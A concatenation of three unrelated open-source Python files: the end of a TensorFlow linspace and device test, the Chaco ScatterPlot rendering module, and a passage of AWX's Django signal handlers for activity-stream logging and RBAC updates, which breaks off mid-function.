np.array([-1., -7. / 3., -11. / 3., -5.]), 1e-5)
def testNegativeToPositive(self):
self.assertArrayNear(self._LinSpace(-1., 5., 1), np.array([-1.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 2), np.array([-1., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 3),
np.array([-1., 2., 5.]), 1e-5)
self.assertArrayNear(self._LinSpace(-1., 5., 4),
np.array([-1., 1., 3., 5.]), 1e-5)
def testPoint(self):
self.assertArrayNear(self._LinSpace(5., 5., 1), np.array([5.]), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 2), np.array([5.] * 2), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 3), np.array([5.] * 3), 1e-5)
self.assertArrayNear(self._LinSpace(5., 5., 4), np.array([5.] * 4), 1e-5)
class DeviceTest(tf.test.TestCase):
def testNoDevice(self):
with tf.Graph().as_default():
var = tf.Variable([[1.0, 1.0]])
self.assertEqual(None, var.device)
self.assertEqual(None, var.initializer.device)
def testDevice(self):
with tf.Graph().as_default():
with tf.device("/job:ps"):
var = tf.Variable([[1.0, 1.0]])
self.assertEqual("/job:ps", var.device)
self.assertEqual("/job:ps", var.initializer.device)
if __name__ == "__main__":
tf.test.main()
|
|
""" Defines the ScatterPlot class, and associated Traits UI view and helper
function.
"""
# Standard library imports
import itertools
# Major library imports
from numpy import around, array, asarray, column_stack, \
isfinite, isnan, nanargmin, ndarray, sqrt, sum, transpose, where
# Enthought library imports
from enable.api import black_color_trait, ColorTrait, AbstractMarker, \
CustomMarker, MarkerNameDict, MarkerTrait
from kiva.constants import STROKE
from traits.api import Any, Array, Bool, Float, Trait, Callable, Property, \
Tuple, Either, cached_property
from traitsui.api import View, VGroup, Item
# Local relative imports
from base_xy_plot import BaseXYPlot
from speedups import scatterplot_gather_points
from base import reverse_map_1d
#------------------------------------------------------------------------------
# Traits UI View for customizing a scatter plot.
#------------------------------------------------------------------------------
class ScatterPlotView(View):
""" Traits UI View for customizing a scatter plot.
"""
def __init__(self):
vgroup = VGroup(
Item("marker", label="Marker type"),
Item("marker_size", label="Size"),
Item("color", label="Color", style="custom"),
)
super(ScatterPlotView, self).__init__(vgroup)
self.buttons = ["OK", "Cancel"]
#------------------------------------------------------------------------------
# Helper functions for scatterplot rendering
#------------------------------------------------------------------------------
def render_markers(gc, points, marker, marker_size,
color, line_width, outline_color,
custom_symbol=None, debug=False, point_mask=None):
""" Helper function for a PlotComponent instance to render a
set of (x,y) points onto a graphics context. Currently, it makes some
assumptions about the attributes on the plot object; these may be factored
out eventually.
Parameters
----------
gc : GraphicsContext
The target for rendering the points
points : array of (x,y) points
The points to render
marker : string, class, or instance
The type of marker to use for the points
marker_size : number
The size of the markers
color : RGB(A) color
The color of the markers
line_width : number
The width, in pixels, of the marker outline
outline_color : RGB(A) color
The color of the marker outline
custom_symbol : CompiledPath
If the marker style is 'custom', this is the symbol
point_mask : array of bools
The mask specifying which points need to be rendered. The `points`
array is already masked
"""
if len(points) == 0:
return
# marker can be string, class, or instance
if isinstance(marker, basestring):
marker = MarkerNameDict[marker]()
elif issubclass(marker, AbstractMarker):
marker = marker()
with gc:
gc.set_line_dash(None)
if marker.draw_mode == STROKE:
# markers with the STROKE draw mode will not be visible
# if the line width is zero, so set it to 1
if line_width == 0:
line_width = 1.0
gc.set_stroke_color(color)
gc.set_line_width(line_width)
else:
gc.set_stroke_color(outline_color)
gc.set_line_width(line_width)
gc.set_fill_color(color)
gc.begin_path()
# try to invoke optimized routines if only one size and gc supports
if not isinstance(marker_size, ndarray):
# try fastest routine
if not isinstance(marker, CustomMarker):
# get fast renderer, or dummy if not implemented
renderer = getattr(gc, 'draw_marker_at_points', lambda *a: 0)
result = renderer(points, marker_size, marker.kiva_marker)
# it worked, we're done
if result != 0:
return
# try next fastest routine
if hasattr(gc, 'draw_path_at_points'):
if not isinstance(marker, CustomMarker):
path = gc.get_empty_path()
marker.add_to_path(path, marker_size)
mode = marker.draw_mode
else:
path = custom_symbol
mode = STROKE
if not marker.antialias:
gc.set_antialias(False)
gc.draw_path_at_points(points, path, mode)
return
if isinstance(marker_size, ndarray):
if point_mask is not None:
marker_size = marker_size[point_mask]
else:
marker_size = itertools.repeat(marker_size)
if not marker.antialias:
gc.set_antialias(False)
if not isinstance(marker, CustomMarker):
for pt,size in itertools.izip(points, marker_size):
sx, sy = pt
with gc:
gc.translate_ctm(sx, sy)
# Kiva GCs have a path-drawing interface
marker.add_to_path(gc, size)
gc.draw_path(marker.draw_mode)
else:
path = custom_symbol
for pt,size in itertools.izip(points, marker_size):
sx, sy = pt
with gc:
gc.translate_ctm(sx, sy)
gc.scale_ctm(size, size)
gc.add_path(path)
gc.draw_path(STROKE)
return
#------------------------------------------------------------------------------
# The scatter plot
#------------------------------------------------------------------------------
class ScatterPlot(BaseXYPlot):
"""
Renders a scatter plot, given an index and value arrays.
"""
# The CompiledPath to use if **marker** is set to "custom". This attribute
# must be a compiled path for the Kiva context onto which this plot will
# be rendered. Usually, importing kiva.GraphicsContext will do
# the right thing.
custom_symbol = Any
#------------------------------------------------------------------------
# Styles on a ScatterPlot
#------------------------------------------------------------------------
# The type of marker to use. This is a mapped trait using strings as the
# keys.
marker = MarkerTrait
# The pixel size of the markers, not including the thickness of the outline.
# Default value is 4.0.
# TODO: for consistency, there should be a size data source and a mapper
marker_size = Either(Float, Array)
# The function which actually renders the markers
render_markers_func = Callable(render_markers)
# The thickness, in pixels, of the outline to draw around the marker. If
# this is 0, no outline is drawn.
line_width = Float(1.0)
# The fill color of the marker.
color = black_color_trait
# The color of the outline to draw around the marker.
outline_color = black_color_trait
# The RGBA tuple for rendering lines. It is always a tuple of length 4.
# It has the same RGB values as color_, and its alpha value is the alpha
# value of self.color multiplied by self.alpha.
effective_color = Property(Tuple, depends_on=['color', 'alpha'])
# The RGBA tuple for rendering the fill. It is always a tuple of length 4.
# It has the same RGB values as outline_color_, and its alpha value is the
# alpha value of self.outline_color multiplied by self.alpha.
effective_outline_color = Property(Tuple, depends_on=['outline_color', 'alpha'])
# Traits UI View for customizing the plot.
traits_view = ScatterPlotView()
#------------------------------------------------------------------------
# Selection and selection rendering
# A selection on the lot is indicated by setting the index or value
# datasource's 'selections' metadata item to a list of indices, or the
# 'selection_mask' metadata to a boolean array of the same length as the
# datasource.
#------------------------------------------------------------------------
show_selection = Bool(True)
selection_marker = MarkerTrait
selection_marker_size = Float(4.0)
selection_line_width = Float(1.0)
selection_color = ColorTrait("yellow")
selection_outline_color = black_color_trait
#------------------------------------------------------------------------
# Private traits
#------------------------------------------------------------------------
_cached_selected_pts = Trait(None, None, Array)
_cached_selected_screen_pts = Array
_cached_point_mask = Array
_cached_selection_point_mask = Array
_selection_cache_valid = Bool(False)
#------------------------------------------------------------------------
# Overridden PlotRenderer methods
#------------------------------------------------------------------------
def map_screen(self, data_array):
""" Maps an array of data points into screen space and returns it as
an array.
Implements the AbstractPlotRenderer interface.
"""
# data_array is Nx2 array
if len(data_array) == 0:
return []
data_array = asarray(data_array)
if len(data_array.shape) == 1:
x_ary = data_array[0]
y_ary = data_array[1]
else:
x_ary = data_array[:, 0]
y_ary = data_array[:, 1]
sx = self.index_mapper.map_screen(x_ary)
sy = self.value_mapper.map_screen(y_ary)
if self.orientation == "h":
return column_stack([sx, sy])
else:
return column_stack([sy, sx])
def map_data(self, screen_pt, all_values=True):
""" Maps a screen space point into the "index" space of the plot.
Overrides the BaseXYPlot implementation, and always returns an
array of (index, value) tuples.
"""
x, y = screen_pt
if self.orientation == 'v':
x, y = y, x
return array((self.index_mapper.map_data(x),
self.value_mapper.map_data(y)))
def map_index(self, screen_pt, threshold=0.0, outside_returns_none=True, \
index_only = False):
""" Maps a screen space point to an index into the plot's index array(s).
Overrides the BaseXYPlot implementation..
"""
index_data = self.index.get_data()
value_data = self.value.get_data()
if len(value_data) == 0 or len(index_data) == 0:
return None
if index_only and self.index.sort_order != "none":
data_pt = self.map_data(screen_pt)[0]
# The rest of this was copied out of BaseXYPlot.
# We can't just used BaseXYPlot.map_index because
# it expect map_data to return a value, not a pair.
if ((data_pt < self.index_mapper.range.low) or \
(data_pt > self.index_mapper.range.high)) and outside_returns_none:
return None
try:
ndx = reverse_map_1d(index_data, data_pt, self.index.sort_order)
except IndexError, e:
# if reverse_map raises this exception, it means that data_pt is
# outside the range of values in index_data.
if outside_returns_none:
return None
else:
if data_pt < index_data[0]:
return 0
else:
return len(index_data) - 1
if threshold == 0.0:
# Don't do any threshold testing
return ndx
x = index_data[ndx]
y = value_data[ndx]
if isnan(x) or isnan(y):
return None
sx, sy = self.map_screen([x,y])
if ((threshold == 0.0) or (screen_pt[0]-sx) < threshold):
return ndx
else:
return None
else:
# Brute force implementation
all_data = transpose(array([index_data, value_data]))
screen_points = around(self.map_screen(all_data))
if len(screen_points) == 0:
return None
if index_only:
distances = abs(screen_points[:,0] - screen_pt[0])
else:
delta = screen_points - array([screen_pt])
distances = sqrt(sum(delta*delta, axis=1))
closest_ndx = nanargmin(distances)
if distances[closest_ndx] <= threshold:
return closest_ndx
else:
return None
#------------------------------------------------------------------------
# Private methods; implements the BaseXYPlot stub methods
#------------------------------------------------------------------------
def _gather_points_old(self):
"""
Collects the data points that are within the bounds of the plot and
caches them
"""
if self._cache_valid and self._selection_cache_valid:
return
if not self.index or not self.value:
return
index, index_mask = self.index.get_data_mask()
value, value_mask = self.value.get_data_mask()
if len(index) == 0 or len(value) == 0 or len(index) != len(value):
self._cached_data_pts = []
self._cached_point_mask = []
self._cache_valid = True
return
index_range_mask = self.index_mapper.range.mask_data(index)
value_range_mask = self.value_mapper.range.mask_data(value)
nan_mask = (isfinite(index) & index_mask &
isfinite(value) & value_mask)
point_mask = nan_mask & index_range_mask & value_range_mask
if not self._cache_valid:
if not point_mask.all():
points = column_stack([index[point_mask], value[point_mask]])
else:
points = column_stack([index, value])
self._cached_data_pts = points
self._cached_point_mask = point_mask
self._cache_valid = True
if not self._selection_cache_valid:
indices = None
# Check both datasources for metadata
# XXX: Only one is used, and if both are defined, then self.index
# happens to take precendence. Perhaps this should be more
# structured? Hopefully, when we create the Selection objects,
# we'll have to define a small algebra about how they are combined,
# and this will fall out...
point_mask = point_mask.copy()
for ds in (self.index, self.value):
if ds.metadata.get('selection_masks', None) is not None:
try:
for mask in ds.metadata['selection_masks']:
point_mask &= mask
indices = where(point_mask == True)
points = column_stack([index[indices], value[indices]])
except:
continue
elif ds.metadata.get('selections', None) is not None:
try:
indices = ds.metadata['selections']
point_mask = point_mask[indices]
points = column_stack([index[indices], value[indices]])
except:
continue
else:
continue
self._cached_selection_point_mask = point_mask
self._cached_selected_pts = points
self._selection_cache_valid = True
break
else:
self._cached_selected_pts = None
self._selection_cache_valid = True
return
def _gather_points_fast(self):
if self._cache_valid and self._selection_cache_valid:
return
if not self.index or not self.value:
return
index, index_mask = self.index.get_data_mask()
value, value_mask = self.value.get_data_mask()
index_range = self.index_mapper.range
value_range = self.value_mapper.range
kw = {}
for axis in ("index", "value"):
ds = getattr(self, axis)
if ds.metadata.get('selections', None) is not None:
kw[axis + "_sel"] = ds.metadata['selections']
if ds.metadata.get('selection_mask', None) is not None:
kw[axis + "_sel_mask"] = ds.metadata['selection_mask']
points, selections = scatterplot_gather_points(index, index_range.low, index_range.high,
value, value_range.low, value_range.high,
index_mask = index_mask,
value_mask = value_mask,
**kw)
if not self._cache_valid:
self._cached_data_pts = points
self._cache_valid = True
if not self._selection_cache_valid:
if selections is not None and len(selections) > 0:
self._cached_selected_pts = points[selections]
self._selection_cache_valid = True
else:
self._cached_selected_pts = None
self._selection_cache_valid = True
def _gather_points(self):
#self._gather_points_fast()
self._gather_points_old()
def _render(self, gc, points, icon_mode=False):
"""
This same method is used both to render the scatterplot and to
draw just the iconified version of this plot, with the latter
simply requiring that a few steps be skipped.
"""
if not icon_mode:
gc.save_state()
gc.clip_to_rect(self.x, self.y, self.width, self.height)
self.render_markers_func(gc, points, self.marker, self.marker_size,
self.effective_color, self.line_width, self.effective_outline_color,
self.custom_symbol, point_mask=self._cached_point_mask)
if self._cached_selected_pts is not None and len(self._cached_selected_pts) > 0:
sel_pts = self.map_screen(self._cached_selected_pts)
self.render_markers_func(gc, sel_pts, self.selection_marker,
self.selection_marker_size, self.selection_color_,
self.selection_line_width, self.selection_outline_color_,
self.custom_symbol, point_mask=self._cached_point_mask)
if not icon_mode:
# Draw the default axes, if necessary
self._draw_default_axes(gc)
gc.restore_state()
def _render_icon(self, gc, x, y, width, height):
point = array([x+width/2, y+height/2])
self._render(gc, [point], icon_mode=True)
return
#------------------------------------------------------------------------
# Event handlers
#------------------------------------------------------------------------
def _alpha_changed(self):
self.invalidate_draw()
self.request_redraw()
def _marker_changed(self):
self.invalidate_draw()
self.request_redraw()
def _marker_size_changed(self):
self.invalidate_draw()
self.request_redraw()
def _line_width_changed(self):
self.invalidate_draw()
self.request_redraw()
def _color_changed(self):
self.invalidate_draw()
self.request_redraw()
def _outline_color_changed(self):
self.invalidate_draw()
self.request_redraw()
def _either_metadata_changed(self):
if self.show_selection:
# Only redraw when we are showing the selection. Otherwise, there
# is nothing to update in response to this event.
self._selection_cache_valid = False
self.invalidate_draw()
self.request_redraw()
#------------------------------------------------------------------------
# Defaults
#------------------------------------------------------------------------
def _marker_size_default(self):
return 4.0
#------------------------------------------------------------------------
# Properties
#------------------------------------------------------------------------
@cached_property
def _get_effective_color(self):
if len(self.color_) == 4:
edge_alpha = self.color_[-1]
else:
edge_alpha = 1.0
c = self.color_[:3] + (edge_alpha * self.alpha,)
return c
@cached_property
def _get_effective_outline_color(self):
if len(self.outline_color_) == 4:
edge_alpha = self.outline_color_[-1]
else:
edge_alpha = 1.0
c = self.outline_color_[:3] + (edge_alpha * self.alpha,)
return c
# EOF
|
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import contextlib
import logging
import threading
import json
import sys
# Django
from django.db import connection
from django.conf import settings
from django.db.models.signals import (
pre_save,
post_save,
pre_delete,
post_delete,
m2m_changed,
)
from django.dispatch import receiver
from django.contrib.auth import SESSION_KEY
from django.contrib.sessions.models import Session
from django.utils import timezone
# Django-CRUM
from crum import get_current_request, get_current_user
from crum.signals import current_user_getter
# AWX
from awx.main.models import (
ActivityStream, Group, Host, InstanceGroup, Inventory, InventorySource,
Job, JobHostSummary, JobTemplate, OAuth2AccessToken, Organization, Project,
Role, SystemJob, SystemJobTemplate, UnifiedJob, UnifiedJobTemplate, User,
UserSessionMembership, WorkflowJobTemplateNode, WorkflowApproval,
WorkflowApprovalTemplate, ROLE_SINGLETON_SYSTEM_ADMINISTRATOR
)
from awx.main.constants import CENSOR_VALUE
from awx.main.utils import model_instance_diff, model_to_dict, camelcase_to_underscore, get_current_apps
from awx.main.utils import ignore_inventory_computed_fields, ignore_inventory_group_removal, _inventory_updates
from awx.main.tasks import update_inventory_computed_fields
from awx.main.fields import (
is_implicit_parent,
update_role_parentage_for_instance,
)
from awx.main import consumers
from awx.conf.utils import conf_to_dict
__all__ = []
logger = logging.getLogger('awx.main.signals')
analytics_logger = logging.getLogger('awx.analytics.activity_stream')
# Update has_active_failures for inventory/groups when a Host/Group is deleted,
# when a Host-Group or Group-Group relationship is updated, or when a Job is deleted
def get_activity_stream_class():
if 'migrate' in sys.argv:
return get_current_apps().get_model('main', 'ActivityStream')
else:
return ActivityStream
def get_current_user_or_none():
u = get_current_user()
if not isinstance(u, User):
return None
return u
def emit_update_inventory_on_created_or_deleted(sender, **kwargs):
if getattr(_inventory_updates, 'is_updating', False):
return
instance = kwargs['instance']
if ('created' in kwargs and kwargs['created']) or \
kwargs['signal'] == post_delete:
pass
else:
return
sender_name = str(sender._meta.verbose_name)
logger.debug("%s created or deleted, updating inventory computed fields: %r %r",
sender_name, sender, kwargs)
try:
inventory = instance.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
connection.on_commit(
lambda: update_inventory_computed_fields.delay(inventory.id)
)
def rebuild_role_ancestor_list(reverse, model, instance, pk_set, action, **kwargs):
'When a role parent is added or removed, update our role hierarchy list'
if action == 'post_add':
if reverse:
model.rebuild_role_ancestor_list(list(pk_set), [])
else:
model.rebuild_role_ancestor_list([instance.id], [])
if action in ['post_remove', 'post_clear']:
if reverse:
model.rebuild_role_ancestor_list([], list(pk_set))
else:
model.rebuild_role_ancestor_list([], [instance.id])
def sync_superuser_status_to_rbac(instance, **kwargs):
'When the is_superuser flag is changed on a user, reflect that in the membership of the System Admnistrator role'
update_fields = kwargs.get('update_fields', None)
if update_fields and 'is_superuser' not in update_fields:
return
if instance.is_superuser:
Role.singleton(ROLE_SINGLETON_SYSTEM_ADMINISTRATOR).members.add(instance)
else:
Role.singleton(ROLE_SINGLETON_SYSTEM_ADMINISTRATOR).members.remove(instance)
def rbac_activity_stream(instance, sender, **kwargs):
# Only if we are associating/disassociating
if kwargs['action'] in ['pre_add', 'pre_remove']:
if hasattr(instance, 'content_type'): # Duck typing, migration-independent isinstance(instance, Role)
if instance.content_type_id is None and instance.singleton_name == ROLE_SINGLETON_SYSTEM_ADMINISTRATOR:
# Skip entries for the system admin role because user serializer covers it
# System auditor role is shown in the serializer, but its relationship is
# managed separately, its value is incorrect, and a correction entry is needed
return
# This juggles which role to use, because could be A->B or B->A association
if sender.__name__ == 'Role_parents':
role = kwargs['model'].objects.filter(pk__in=kwargs['pk_set']).first()
# don't record implicit creation / parents in activity stream
if role is not None and is_implicit_parent(parent_role=role, child_role=instance):
return
else:
role = instance
# If a singleton role is the instance, the singleton role is acted on
# otherwise the related object is considered to be acted on
if instance.content_object:
instance = instance.content_object
else:
# Association with actor, like role->user
role = kwargs['model'].objects.filter(pk__in=kwargs['pk_set']).first()
activity_stream_associate(sender, instance, role=role, **kwargs)
def cleanup_detached_labels_on_deleted_parent(sender, instance, **kwargs):
for label in instance.labels.all():
if label.is_candidate_for_detach():
label.delete()
def save_related_job_templates(sender, instance, **kwargs):
'''save_related_job_templates loops through all of the
job templates that use an Inventory that have had their
Organization updated. This triggers the rebuilding of the RBAC hierarchy
and ensures the proper access restrictions.
'''
if sender is not Inventory:
raise ValueError('This signal callback is only intended for use with Project or Inventory')
update_fields = kwargs.get('update_fields', None)
if ((update_fields and not ('organization' in update_fields or 'organization_id' in update_fields)) or
kwargs.get('created', False)):
return
if instance._prior_values_store.get('organization_id') != instance.organization_id:
jtq = JobTemplate.objects.filter(**{sender.__name__.lower(): instance})
for jt in jtq:
parents_added, parents_removed = update_role_parentage_for_instance(jt)
if parents_added or parents_removed:
logger.info('Permissions on JT {} changed due to inventory {} organization change from {} to {}.'.format(
jt.pk, instance.pk, instance._prior_values_store.get('organization_id'), instance.organization_id
))
def connect_computed_field_signals():
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_save.connect(emit_update_inventory_on_created_or_deleted, sender=Job)
post_delete.connect(emit_update_inventory_on_created_or_deleted, sender=Job)
connect_computed_field_signals()
post_save.connect(save_related_job_templates, sender=Inventory)
m2m_changed.connect(rebuild_role_ancestor_list, Role.parents.through)
m2m_changed.connect(rbac_activity_stream, Role.members.through)
m2m_changed.connect(rbac_activity_stream, Role.parents.through)
post_save.connect(sync_superuser_status_to_rbac, sender=User)
pre_delete.connect(cleanup_detached_labels_on_deleted_parent, sender=UnifiedJob)
pre_delete.connect(cleanup_detached_labels_on_deleted_parent, sender=UnifiedJobTemplate)
# Migrate hosts, groups to parent group(s) whenever a group is deleted
@receiver(pre_delete, sender=Group)
def save_related_pks_before_group_delete(sender, **kwargs):
if getattr(_inventory_updates, 'is_removing', False):
return
instance = kwargs['instance']
instance._saved_inventory_pk = instance.inventory.pk
instance._saved_parents_pks = set(instance.parents.values_list('pk', flat=True))
instance._saved_hosts_pks = set(instance.hosts.values_list('pk', flat=True))
instance._saved_children_pks = set(instance.children.values_list('pk', flat=True))
@receiver(post_delete, sender=Group)
def migrate_children_from_deleted_group_to_parent_groups(sender, **kwargs):
if getattr(_inventory_updates, 'is_removing', False):
return
instance = kwargs['instance']
parents_pks = getattr(instance, '_saved_parents_pks', [])
hosts_pks = getattr(instance, '_saved_hosts_pks', [])
children_pks = getattr(instance, '_saved_children_pks', [])
is_updating = getattr(_inventory_updates, 'is_updating', False)
with ignore_inventory_group_removal():
with ignore_inventory_computed_fields():
if parents_pks:
for parent_group in Group.objects.filter(pk__in=parents_pks):
for child_host in Host.objects.filter(pk__in=hosts_pks):
logger.debug('adding host %s to parent %s after group deletion',
child_host, parent_group)
parent_group.hosts.add(child_host)
for child_group in Group.objects.filter(pk__in=children_pks):
logger.debug('adding group %s to parent %s after group deletion',
child_group, parent_group)
parent_group.children.add(child_group)
inventory_pk = getattr(instance, '_saved_inventory_pk', None)
if inventory_pk and not is_updating:
try:
inventory = Inventory.objects.get(pk=inventory_pk)
inventory.update_computed_fields()
except (Inventory.DoesNotExist, Project.DoesNotExist):
pass
# Update host pointers to last_job and last_job_host_summary when a job is deleted
def _update_host_last_jhs(host):
jhs_qs = JobHostSummary.objects.filter(host__pk=host.pk)
try:
jhs = jhs_qs.order_by('-job__pk')[0]
except IndexError:
jhs = None
update_fields = []
try:
last_job = jhs.job if jhs else None
except Job.DoesNotExist:
# The job (and its summaries) have already been/are currently being
# deleted, so there's no need to update the host w/ a reference to it
return
if host.last_job != last_job:
host.last_job = last_job
update_fields.append('last_job')
if host.last_job_host_summary != jhs:
host.last_job_host_summary = jhs
update_fields.append('last_job_host_summary')
if update_fields:
host.save(update_fields=update_fields)
@receiver(pre_delete, sender=Job)
def save_host_pks_before_job_delete(sender, **kwargs):
instance = kwargs['instance']
hosts_qs = Host.objects.filter( last_job__pk=instance.pk)
instance._saved_hosts_pks = set(hosts_qs.values_list('pk', flat=True))
@receiver(post_delete, sender=Job)
def update_host_last_job_after_job_deleted(sender, **kwargs):
instance = kwargs['instance']
hosts_pks = getattr(instance, '_saved_hosts_pks', [])
for host in Host.objects.filter(pk__in=hosts_pks):
_update_host_last_jhs(host)
# Set via ActivityStreamRegistrar to record activity stream events
class ActivityStreamEnabled(threading.local):
def __init__(self):
self.enabled = True
def __bool__(self):
return bool(self.enabled and getattr(settings, 'ACTIVITY_STREAM_ENABLED', True))
activity_stream_enabled = ActivityStreamEnabled()
@contextlib.contextmanager
def disable_activity_stream():
'''
Context manager to disable capturing activity stream changes.
'''
try:
previous_value = activity_stream_enabled.enabled
activity_stream_enabled.enabled = False
yield
finally:
activity_stream_enabled.enabled = previous_value
@contextlib.contextmanager
def disable_computed_fields():
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Host)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Group)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=InventorySource)
post_save.disconnect(emit_update_inventory_on_created_or_deleted, sender=Job)
post_delete.disconnect(emit_update_inventory_on_created_or_deleted, sender=Job)
yield
connect_computed_field_signals()
def model_serializer_mapping():
from awx.api import serializers
from awx.main import models
from awx.conf.models import Setting
from awx.conf.serializers import SettingSerializer
return {
Setting: SettingSerializer,
models.User: serializers.UserActivityStreamSerializer,
models.Organization: serializers.OrganizationSerializer,
models.Inventory: serializers.InventorySerializer,
models.Host: serializers.HostSerializer,
models.Group: serializers.GroupSerializer,
models.InstanceGroup: serializers.InstanceGroupSerializer,
models.InventorySource: serializers.InventorySourceSerializer,
models.CustomInventoryScript: serializers.CustomInventoryScriptSerializer,
models.Credential: serializers.CredentialSerializer,
models.Team: serializers.TeamSerializer,
models.Project: serializers.ProjectSerializer,
models.JobTemplate: serializers.JobTemplateWithSpecSerializer,
models.Job: serializers.JobSerializer,
models.AdHocCommand: serializers.AdHocCommandSerializer,
models.NotificationTemplate: serializers.NotificationTemplateSerializer,
models.Notification: serializers.NotificationSerializer,
models.CredentialType: serializers.CredentialTypeSerializer,
models.Schedule: serializers.ScheduleSerializer,
models.Label: serializers.LabelSerializer,
models.WorkflowJobTemplate: serializers.WorkflowJobTemplateWithSpecSerializer,
models.WorkflowJobTemplateNode: serializers.WorkflowJobTemplateNodeSerializer,
models.WorkflowApproval: serializers.WorkflowApprovalActivityStreamSerializer,
models.WorkflowApprovalTemplate: serializers.WorkflowApprovalTemplateSerializer,
models.WorkflowJob: serializers.WorkflowJobSerializer,
models.OAuth2AccessToken: serializers.OAuth2TokenSerializer,
models.OAuth2Application: serializers.OAuth2ApplicationSerializer,
}
def emit_activity_stream_change(instance):
if 'migrate' in sys.argv:
# don't emit activity stream external logs during migrations, it
# could be really noisy
return
from awx.api.serializers import ActivityStreamSerializer
actor = None
if instance.actor:
actor = instance.actor.username
summary_fields = ActivityStreamSerializer(instance).get_summary_fields(instance)
analytics_logger.info('Activity Stream update entry for %s' % str(instance.object1),
extra=dict(changes=instance.changes, relationship=instance.object_relationship_type,
actor=actor, operation=instance.operation,
object1=instance.object1, object2=instance.object2, summary_fields=summary_fields))
def activity_stream_create(sender, instance, created, **kwargs):
if created and activity_stream_enabled:
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1 = camelcase_to_underscore(instance.__class__.__name__)
changes = model_to_dict(instance, model_serializer_mapping())
# Special case where Job survey password variables need to be hidden
if type(instance) == Job:
changes['credentials'] = [
'{} ({})'.format(c.name, c.id)
for c in instance.credentials.iterator()
]
changes['labels'] = [label.name for label in instance.labels.iterator()]
if 'extra_vars' in changes:
changes['extra_vars'] = instance.display_extra_vars()
if type(instance) == OAuth2AccessToken:
changes['token'] = CENSOR_VALUE
activity_entry = get_activity_stream_class()(
operation='create',
object1=object1,
changes=json.dumps(changes),
actor=get_current_user_or_none())
#TODO: Weird situation where cascade SETNULL doesn't work
# it might actually be a good idea to remove all of these FK references since
# we don't really use them anyway.
if instance._meta.model_name != 'setting': # Is not conf.Setting instance
activity_entry.save()
getattr(activity_entry, object1).add(instance.pk)
else:
activity_entry.setting = conf_to_dict(instance)
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_update(sender, instance, **kwargs):
if instance.id is None:
return
if not activity_stream_enabled:
return
try:
old = sender.objects.get(id=instance.id)
except sender.DoesNotExist:
return
new = instance
changes = model_instance_diff(old, new, model_serializer_mapping())
if changes is None:
return
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1 = camelcase_to_underscore(instance.__class__.__name__)
activity_entry = get_activity_stream_class()(
operation='update',
object1=object1,
changes=json.dumps(changes),
actor=get_current_user_or_none())
if instance._meta.model_name != 'setting': # Is not conf.Setting instance
activity_entry.save()
getattr(activity_entry, object1).add(instance.pk)
else:
activity_entry.setting = conf_to_dict(instance)
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_delete(sender, instance, **kwargs):
if not activity_stream_enabled:
return
# Inventory delete happens in the task system rather than request-response-cycle.
# If we trigger this handler there we may fall into db-integrity-related race conditions.
# So we add flag verification to prevent normal signal handling. This funciton will be
# explicitly called with flag on in Inventory.schedule_deletion.
changes = {}
if isinstance(instance, Inventory):
if not kwargs.get('inventory_delete_flag', False):
return
# Add additional data about child hosts / groups that will be deleted
changes['coalesced_data'] = {
'hosts_deleted': instance.hosts.count(),
'groups_deleted': instance.groups.count()
}
elif isinstance(instance, (Host, Group)) and instance.inventory.pending_deletion:
return # accounted for by inventory entry, above
_type = type(instance)
if getattr(_type, '_deferred', False):
return
changes.update(model_to_dict(instance, model_serializer_mapping()))
object1 = camelcase_to_underscore(instance.__class__.__name__)
if type(instance) == OAuth2AccessToken:
changes['token'] = CENSOR_VALUE
activity_entry = get_activity_stream_class()(
operation='delete',
changes=json.dumps(changes),
object1=object1,
actor=get_current_user_or_none())
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_associate(sender, instance, **kwargs):
if not activity_stream_enabled:
return
if kwargs['action'] in ['pre_add', 'pre_remove']:
if kwargs['action'] == 'pre_add':
action = 'associate'
elif kwargs['action'] == 'pre_remove':
action = 'disassociate'
else:
return
obj1 = instance
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1=camelcase_to_underscore(obj1.__class__.__name__)
obj_rel = sender.__module__ + "." + sender.__name__
for entity_acted in kwargs['pk_set']:
obj2 = kwargs['model']
obj2_id = entity_acted
obj2_actual = obj2.objects.filter(id=obj2_id)
if not obj2_actual.exists():
continue
obj2_actual = obj2_actual[0]
_type = type(obj2_actual)
if getattr(_type, '_deferred', False):
return
if isinstance(obj2_actual, Role) and obj2_actual.content_object is not None:
obj2_actual = obj2_actual.content_object
object2 = camelcase_to_underscore(obj2_actual.__class__.__name__)
else:
object2 = camelcase_to_underscore(obj2.__name__)
# Skip recording any inventory source, or system job template changes here.
if isinstance(obj1, InventorySource) or isinstance(obj2_actual, InventorySource):
continue
if isinstance(obj1, SystemJobTemplate) or isinstance(obj2_actual, SystemJobTemplate):
continue
if isinstance(obj1, SystemJob) or isinstance(obj2_actual, SystemJob):
continue
activity_entry = get_activity_stream_class()(
changes=json.dumps(dict(object1=object1,
object1_pk=obj1.pk,
object2=object2,
object2_pk=obj2_id,
action=action,
relationship=obj_rel)),
operation=action,
object1=object1,
object2=object2,
